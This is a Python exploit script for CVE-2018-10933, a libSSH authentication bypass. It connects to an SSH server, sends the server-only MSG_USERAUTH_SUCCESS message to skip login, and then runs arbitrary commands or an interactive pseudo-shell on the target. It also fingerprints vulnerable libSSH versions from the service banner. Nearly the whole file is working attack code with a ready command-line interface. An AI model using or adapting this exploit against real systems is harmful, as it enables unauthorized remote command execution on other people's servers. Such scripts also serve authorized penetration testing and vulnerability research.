#!/usr/bin/python3
#
# CVE-2018-10933 libSSH authentication bypass exploit
#
# The libSSH library has a flawed authentication/connection state machine.
# Upon receiving the MSG_USERAUTH_SUCCESS message from a connecting client
# (as described in RFC 4252, sec. 5.1) - an authentication response message
# that should only be sent by the server itself (never accepted from a client) -
# libSSH switches to the successful post-authentication state. In that state,
# it impersonates the connecting client as the server's root user and begins
# executing delivered commands.
# This results in opening an authenticated remote-access channel
# without any authentication attempt (authentication bypass).
#
# Below exploit contains modified code taken from:
# - https://github.com/leapsecurity/libssh-scanner
#
# Known issues:
# - The UnauthSSH.NOT_WORKING_shell() function (the original shell()) does not work:
# I never got paramiko.Channel.invoke_shell() working from a custom
# transport object. Therefore, as a workaround, the `UnauthSSH.parashell()` function
# was implemented; UnauthSSH.shell() delegates to it to provide a pseudo-shell.
#
# Requirements:
# - paramiko
#
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
#
import sys
import socket
import time
import argparse
from sys import argv , exit
try :
import paramiko
except ImportError :
print ( ' [!] Paramiko required: python3 -m pip install paramiko ' )
sys . exit ( 1 )
# Exploit version string; main() interpolates it into the start-up banner.
VERSION = ' 0.1 '
# Global runtime settings shared by every function in this script.
# parse_opts() overwrites host, port, log, command, shell, verbose and debug
# from the command line; the remaining entries keep the defaults below.
config = {
# When true, Logger.dbg() prints and Logger._out() based messages are shown.
' debug ' : False ,
# When true, Logger._out() based messages (out/info/fail/ok) are shown.
' verbose ' : False ,
# Target host name or IP address.
' host ' : ' ' ,
# Target TCP port.
' port ' : 22 ,
# Path handed to paramiko.util.log_to_file() by main() when non-empty.
' log ' : ' ' ,
# Timeout (seconds) used for the banner connection and Transport.start_client().
' connection_timeout ' : 5.0 ,
# Timeout (seconds) used for Transport.open_session() and UnauthSSH._send_recv().
' session_timeout ' : 10.0 ,
# Maximum number of bytes requested per recv() call.
' buflen ' : 4096 ,
# Single command to execute on the target; empty means "no command".
' command ' : ' ' ,
# When true, main() runs exploit(), which spawns the pseudo-shell.
' shell ' : False ,
}
class Logger:
    """Tiny stdout logger whose verbosity is driven by the global ``config``.

    ``err`` always prints, ``dbg`` prints only in debug mode, and every other
    level funnels through ``_out``, which prints in debug or verbose mode.
    """

    @staticmethod
    def _out(x):
        """Write ``x`` to stdout when debug or verbose output is enabled."""
        if not config[' debug '] and not config[' verbose ']:
            return
        line = x + ' \n '
        sys.stdout.write(line)

    @staticmethod
    def dbg(x):
        """Write a ``[dbg]``-prefixed message; shown only in debug mode."""
        if not config[' debug ']:
            return
        line = ' [dbg] ' + x + ' \n '
        sys.stdout.write(line)

    @staticmethod
    def out(x):
        """Emit a neutral ``[.]`` message through ``_out``."""
        message = ' [.] ' + x
        Logger._out(message)

    @staticmethod
    def info(x):
        """Emit an informational ``[?]`` message through ``_out``."""
        message = ' [?] ' + x
        Logger._out(message)

    @staticmethod
    def err(x):
        """Write a ``[!]`` error message unconditionally."""
        line = ' [!] ' + x + ' \n '
        sys.stdout.write(line)

    @staticmethod
    def fail(x):
        """Emit a failure ``[-]`` message through ``_out``."""
        message = ' [-] ' + x
        Logger._out(message)

    @staticmethod
    def ok(x):
        """Emit a success ``[+]`` message through ``_out``."""
        message = ' [+] ' + x
        Logger._out(message)
class UnauthSSH:
    """SSH client that skips authentication by sending MSG_USERAUTH_SUCCESS.

    The target host and port are read from the global ``config`` when the
    object is created. A paramiko ``Transport`` is created lazily by
    ``sshAuthBypass()`` and reused while it stays active.
    """

    def __init__(self):
        self.host = config[' host ']
        self.port = config[' port ']
        self.sock = None
        self.transport = None
        # Ensures the "Connecting with ..." message is printed only once.
        self.connectionInfoOnce = False

    def __del__(self):
        # getattr() guards against a partially constructed instance.
        sock = getattr(self, 'sock', None)
        if sock:
            sock.close()

    def sshAuthBypass(self, force=False):
        """Return a transport on which MSG_USERAUTH_SUCCESS has been sent.

        Args:
            force: When true, always open a fresh connection instead of
                reusing the cached transport.

        Returns:
            The paramiko ``Transport`` (also stored in ``self.transport``).

        Exits the process with status 1 when the TCP connection cannot be
        established. Exceptions raised by ``Transport.start_client()`` are
        not caught here.
        """
        if not force and (self.transport and self.transport.is_active()):
            Logger.dbg(' Returning already issued SSH Transport ')
            return self.transport

        # Drop the previous socket (if any) before reconnecting.
        self.__del__()
        self.sock = None

        if not self.connectionInfoOnce:
            self.connectionInfoOnce = True
            Logger.info(' Connecting with {} : {} ... '.format(
                self.host, self.port
            ))

        try:
            # create_connection() applies the configured timeout to the
            # connect attempt and resolves both IPv4 and IPv6 targets.
            self.sock = socket.create_connection(
                (str(self.host), int(self.port)),
                timeout=config[' connection_timeout '],
            )
            Logger.ok(' Connected. ')
        except Exception as e:
            # Fatal: report unconditionally, not only in verbose mode.
            Logger.err(' Could not connect to {} : {} . Exception: {} '.format(
                self.host, self.port, str(e)
            ))
            sys.exit(1)

        message = paramiko.message.Message()
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)

        transport = paramiko.transport.Transport(self.sock)
        transport.start_client(timeout=config[' connection_timeout '])
        # The bypass itself: the client sends the server-only success message.
        transport._send_message(message)

        self.transport = transport
        return transport

    def NOT_WORKING_shell(self):
        """Experimental interactive shell built on ``invoke_shell()``.

        FIXME: invoke_shell() closes channel prematurely. Kept for reference
        only; ``shell()`` uses ``parashell()`` instead.
        """
        transport = self.sshAuthBypass()
        session = transport.open_session(timeout=config[' session_timeout '])
        session.set_combine_stderr(True)
        session.get_pty()
        session.invoke_shell()

        username = UnauthSSH._send_recv(session, 'whoami')
        hostname = UnauthSSH._send_recv(session, 'hostname')
        prompt = ' {} @ {} $ '.format(username, hostname)

        while True:
            inp = input(prompt).strip()
            if not inp or inp.lower() in ('exit', 'quit'):
                Logger.info(' Quitting... ')
                break

            out = UnauthSSH._send_recv(session, inp)
            if not out:
                Logger.err(' Could not constitute stable shell. ')
                return
            print(out)

    def shell(self):
        """Spawn the interactive pseudo-shell (delegates to ``parashell``)."""
        self.parashell()

    def parashell(self):
        """Run a pseudo-shell that executes each input line separately.

        An empty line, ``exit``, ``quit`` or end-of-input leaves the loop.
        The loop aborts only when a command could not be executed at all;
        commands that merely produce no output keep the shell alive.
        """
        username = self.execute(' whoami ')
        hostname = self.execute(' hostname ')

        if not username or not hostname:
            Logger.fail(' Could not obtain username ( {} ) and/or hostname ( {} )! '.format(
                username, hostname
            ))
            return

        prompt = ' {} @ {} $ '.format(username, hostname)
        Logger.info(' Entering pseudo-shell... ')

        while True:
            try:
                inp = input(prompt).strip()
            except EOFError:
                # Ctrl-D / closed stdin behaves like an explicit quit.
                inp = ''

            if not inp or inp.lower() in ('exit', 'quit'):
                Logger.info(' Quitting... ')
                break

            out = self._run(inp)
            if out is None:
                Logger.err(' Could not constitute stable shell. ')
                return
            if out:
                print(out)

    # FIXME: Not used as NOT_WORKING_shell() is bugged.
    @staticmethod
    def _send_recv(session, cmd):
        """Send ``cmd`` to an interactive session and collect its output.

        Returns the decoded output, or ``None`` when the session did not
        report an exit status within ``config[' session_timeout ']`` seconds.

        NOTE(review): the loop waits for the channel's exit status, which an
        interactive shell presumably only reports when it terminates - this
        may be why the interactive shell never worked; confirm.
        """
        out = ''
        session.send(cmd.strip() + ' \n ')

        MAX_TIMEOUT = config[' session_timeout ']
        timeout = 0.0

        while not session.exit_status_ready():
            time.sleep(0.1)
            timeout += 0.1

            if timeout > MAX_TIMEOUT:
                return None

            if session.recv_ready():
                out += session.recv(config[' buflen ']).decode(errors='replace')

            if session.recv_stderr_ready():
                out += session.recv_stderr(config[' buflen ']).decode(errors='replace')

        # Drain whatever is still buffered after the exit status arrived.
        while session.recv_ready():
            out += session.recv(config[' buflen ']).decode(errors='replace')

        return out

    @staticmethod
    def _exec(session, inp):
        """Execute ``inp`` on ``session`` and return its stripped output.

        Output is read while waiting for the exit status, because blocking on
        the exit status first can hang when the command produces more data
        than the channel window holds. Bytes are decoded once at the end so
        multi-byte characters split across reads are not corrupted.
        """
        inp = inp.strip()
        Logger.dbg(' Executing command: " {} " '.format(inp))
        session.exec_command(inp + ' \n ')

        chunks = []
        while not session.exit_status_ready():
            if session.recv_ready():
                chunks.append(session.recv(config[' buflen ']))
            else:
                time.sleep(0.05)

        while session.recv_ready():
            chunks.append(session.recv(config[' buflen ']))

        buf = b''.join(chunks).decode(errors='replace').strip()
        Logger.dbg(' Returned: \n {} '.format(buf))
        return buf

    def _run(self, cmd, printout=False, tryAgain=False):
        """Execute ``cmd``; return its output, or ``None`` on failure.

        Unlike ``execute()``, this lets callers tell a failed execution apart
        from a command that succeeded without printing anything.
        """
        transport = self.sshAuthBypass(force=tryAgain)
        session = transport.open_session(timeout=config[' session_timeout '])
        session.set_combine_stderr(True)

        try:
            buf = UnauthSSH._exec(session, cmd)
        except paramiko.SSHException as e:
            # A closed channel usually means a stale transport: reconnect once.
            if 'channel closed' in str(e).lower() and not tryAgain:
                return self._run(cmd, printout, True)

            if printout and not tryAgain:
                Logger.fail(' Could not execute command ( {} ): " {} " '.format(cmd, str(e)))
            return None

        if printout:
            print(' \n {} $ {} '.format(self.host, cmd))
            print(' {} '.format(buf))

        return buf

    def execute(self, cmd, printout=False, tryAgain=False):
        """Execute ``cmd`` on the target and return its output as a string.

        Args:
            cmd: Command line to run.
            printout: When true, print the command and its output.
            tryAgain: When true, force a fresh connection and do not retry.

        Returns:
            The command output, or an empty string when execution failed.
        """
        buf = self._run(cmd, printout, tryAgain)
        return '' if buf is None else buf
def exploit():
    """Run the configured command on the target, or open the pseudo-shell.

    When ``config[' command ']`` is set, the command is executed and its
    output printed; otherwise the interactive pseudo-shell is started.
    """
    client = UnauthSSH()

    if not config[' command ']:
        client.shell()
        return

    result = client.execute(config[' command '])
    # The command header is only shown in verbose/debug mode.
    header = ' \n $ {} '.format(config[' command '])
    Logger._out(header)
    print(result)
def collectBanner():
    """Connect to the target and return the first line of its SSH banner.

    Returns:
        The first line of the data received (as ``bytes``), or ``b""`` when
        the connection or the read failed.

    The connection timeout also bounds the read, so a service that never
    sends a banner cannot block the scan forever. The socket is closed on
    every path.
    """
    ip = config[' host ']
    port = config[' port ']

    try:
        with socket.create_connection(
            (ip, port), timeout=config[' connection_timeout ']
        ) as s:
            Logger.ok(' Connected to the target: {} : {} '.format(ip, port))
            banner = s.recv(config[' buflen '])
    except (socket.timeout, socket.error) as e:
        Logger.fail(' SSH connection timeout. ')
        Logger.dbg('Banner retrieval failed: {}'.format(e))
        return b""

    return banner.split(b"\n")[0]
def _libssh_version(banner):
    """Return ``(major, minor, patch)`` parsed from a libssh banner, or None.

    Accepts both ``libssh-X.Y.Z`` and ``libssh_X.Y.Z`` spellings. Text after
    the numeric version is ignored; a missing patch level is reported as 0.
    """
    for marker in (b"libssh-", b"libssh_"):
        _, found, tail = banner.partition(marker)
        if found:
            break
    else:
        return None

    numbers = []
    for field in tail.split(b".")[:3]:
        end = 0
        while end < len(field) and field[end:end + 1].isdigit():
            end += 1
        if end == 0:
            break
        numbers.append(int(field[:end]))
        if end < len(field):
            # Non-digit characters terminate the version string.
            break

    if len(numbers) < 2:
        return None
    numbers += [0] * (3 - len(numbers))
    return tuple(numbers)


def check():
    """Fingerprint the target by its SSH banner.

    Switches to verbose output when neither a command nor the shell was
    requested (detect-only mode), then classifies the libssh version found
    in the banner.

    Returns:
        True when the target seems vulnerable, False otherwise (patched,
        not libssh, unrecognised version, or no banner).
    """
    if not config[' command '] and not config[' shell ']:
        config[' verbose '] = True

    banner = collectBanner()

    # Anything other than non-blank bytes counts as "no banner".
    if not isinstance(banner, bytes) or not banner.strip():
        Logger.err(' Could not obtain SSH service banner. ')
        return False

    Logger.info(' Obtained banner: " {} " '.format(
        banner.decode(errors='replace').strip()
    ))

    #
    # NOTICE: The below version-checking logic was taken from:
    # - https://github.com/leapsecurity/libssh-scanner
    #
    version = _libssh_version(banner)
    if version is None:
        Logger.fail(' Target is not vulnerable. ')
        return False

    major, minor, patch = version
    if (major, minor) == (0, 6):
        vulnerable = True
    elif (major, minor) == (0, 7):
        # libssh is 0.7.6 or greater (patched)
        vulnerable = patch < 6
    elif (major, minor) == (0, 8):
        # libssh is 0.8.4 or greater (patched)
        vulnerable = patch < 4
    else:
        Logger.fail(' Target is not vulnerable. ')
        return False

    if vulnerable:
        Logger.ok(' Target seems to be VULNERABLE! ')
        return True

    Logger.info(' Target seems to be PATCHED. ')
    return False
def parse_opts():
    """Parse command-line arguments into the global ``config``.

    Returns:
        True when the options are valid; False when ``--shell`` and
        ``--command`` were combined, in which case the usage help is printed.
        argparse itself exits the process on malformed arguments.
    """
    parser = argparse.ArgumentParser(description=' If there was neither shell nor command option specified - exploit will switch to detect mode yielding vulnerable/not vulnerable flag. ')

    parser.add_argument('host', help=' Hostname/IP address that is running vulnerable libSSH server. ')
    # type=int rejects non-numeric ports up front instead of failing later.
    parser.add_argument('-p', '--port', help=' libSSH port ', type=int, default=22)

    parser.add_argument('-s', '--shell', help=' Exploit the vulnerability and spawn pseudo-shell ', action='store_true', default=False)
    parser.add_argument('-c', '--command', help=' Execute single command. ', default='')
    parser.add_argument('--logfile', help=' Logfile to write paramiko connection logs ', default="")

    parser.add_argument('-v', '--verbose', action='store_true', help=' Display verbose output. ')
    parser.add_argument('-d', '--debug', action='store_true', help=' Display debug output. ')

    args = parser.parse_args()

    config[' host '] = args.host
    config[' port '] = args.port
    config[' log '] = args.logfile
    config[' command '] = args.command
    config[' shell '] = args.shell
    config[' verbose '] = args.verbose
    config[' debug '] = args.debug

    if args.shell and args.command:
        Logger.err(' Shell and command options are mutually exclusive! \n ')
        parser.print_help()
        return False

    return True
def main():
    """Script entry point: print the banner, parse options, check, exploit.

    Returns:
        False when option parsing failed; otherwise None.

    The fingerprinting result of ``check()`` is informational only: when a
    command or the shell was requested, the exploit is attempted regardless.
    """
    sys.stderr.write('''
    :: CVE-2018-10933 libSSH authentication bypass exploit.
    Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
    Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
    v{}

'''.format(VERSION))

    if not parse_opts():
        return False

    if config[' log ']:
        paramiko.util.log_to_file(config[' log '])

    check()

    if config[' command '] or config[' shell ']:
        exploit()
# Run main() only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()